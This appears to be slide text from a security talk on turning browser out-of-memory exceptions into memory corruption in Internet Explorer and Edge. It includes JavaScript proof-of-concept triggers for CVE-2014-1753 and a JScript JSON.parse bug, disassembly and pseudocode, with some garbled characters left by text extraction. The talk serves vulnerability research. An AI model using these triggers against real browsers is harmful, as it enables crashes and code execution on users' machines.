The document discusses exploiting out-of-memory (OOM) exceptions in web browsers to achieve remote code execution. It begins by explaining how OOM exceptions occur in browsers and strategies for triggering them reliably. It then describes a case study of triggering controllable OOM exceptions in Microsoft Edge to corrupt memory. By breaking transaction operations on arrays during an OOM, the author was able to achieve memory corruption and potentially remote code execution on Edge.
8. Browser OOM Example 1
• IE 8 CA_rArray Use Aaer Free (cve-2014-1753)
• Found by fuzzing
function f() {
var size = 0x8000000;
var s = "AAAA";
while (s.length < (size - 2)/2)
s += s;
var x = document.createElement("frame");
x.setAttribute("prop2", s.substring(0, (size - 2)/2));
var node = document.body.appendChild(x);
for ( var y = 0; y < 20; ++ y ) {
var z = node.cloneNode();
document.body.appendChild(z);
}
}
10. Browser OOM Example 2
• IE Jscirpt JSON.parse OOM Memory Corrup3on
var chunksize = 0x2000000;
var json = '['
for ( var i = 0; i < chunksize/0x10; ++ i )
json += '1,'
json += '1]';
var arr = new Array();
try {
for ( var i = 0; i < 0x1000; ++ i )
arr.push(json.substr(0, (chunksize-2)/2));
} catch (e) {} // Force IE into low-memory state by
allocating large amount of memory
while (true) {
JSON.parse(json);
}
11. jscript!JSONParser::ParseObject+0x3fb:
65b4e9da mov eax,dword ptr [esi+14h] // length of the json array
65b4e9dd mov dword ptr [esp+14h],eax
65b4e9e1 shl eax,4 // alloc size = arr_length * 0x10
65b4e9e4 push eax
65b4e9e5 mov dword ptr [esp+20h],eax
65b4e9e9 call dword ptr [jscript!_imp__malloc (65b740fc)]
// malloc can fail if there is no sufficient memory
// malloc fail is not checked and will directly copy content
to address [NULL + arr_size]
65b4ea2f a5 movs dword ptr es:[edi],dword ptr [esi] es:002b:00777fc0=????????
ds:002b:03eb8398=00000003
13. Handled/Not Handled
• Handled OOM
– Developer is aware of poten3al OOM in the code
– But failed to handle it correctly (e.g. the IE CA_rArray
UAF case)
• Not handled OOM
– Developer has no idea about the poten3al OOM in the
code (e.g. the JSON case)
– Can cause unexpected execu3on path change (early
return, excep3on), which can cause exploitable
condi3on
16. Con3nuable/Not Con3nuable
• Con3nuable
– Program can con3nue to execute aaer the OOM
– Exploit possible
• Not Con3nuable
– Program can not con3nue to execute aaer OOM
• Crash immediately due to non-exploitable memory corrup3on
(e.g. null pointer deference)
• Crash ac3vely for alloca3ons that can not fail
• Browser has a memory limita3on, and will crash if memory
exceeds the limita3on
– Not exploitable, only DDOS L
45. Foreach segment in array:
seg->size >>= 1 (1)
if (seg->length > (seg->size >>= 1))
seg = AllocateNewSegment (2)
Seg->ChangeElementToFloat() (3)
Adjust(seg->length) (4)
Break
Allocate a new array segment
can throw Out-of-Memory excep%on.
At this point, seg->size has been diveded by 2, while
seg->length remains unchanged.
64. RCE Case: Array.reverse (Again)
lastUsedSegment = head; (1)
head = AllocateNewHead(); (2)
If the last segment is leaf:
ReallocateLastSegmentToNonLeaf(); (3)
lastUsedSegment = head; (4)
Break
Reallocate non leaf segment may cause out-of-memory
Excep%on. If we break at (3), the array will have
a lastUsedSegment points to an invalidated segment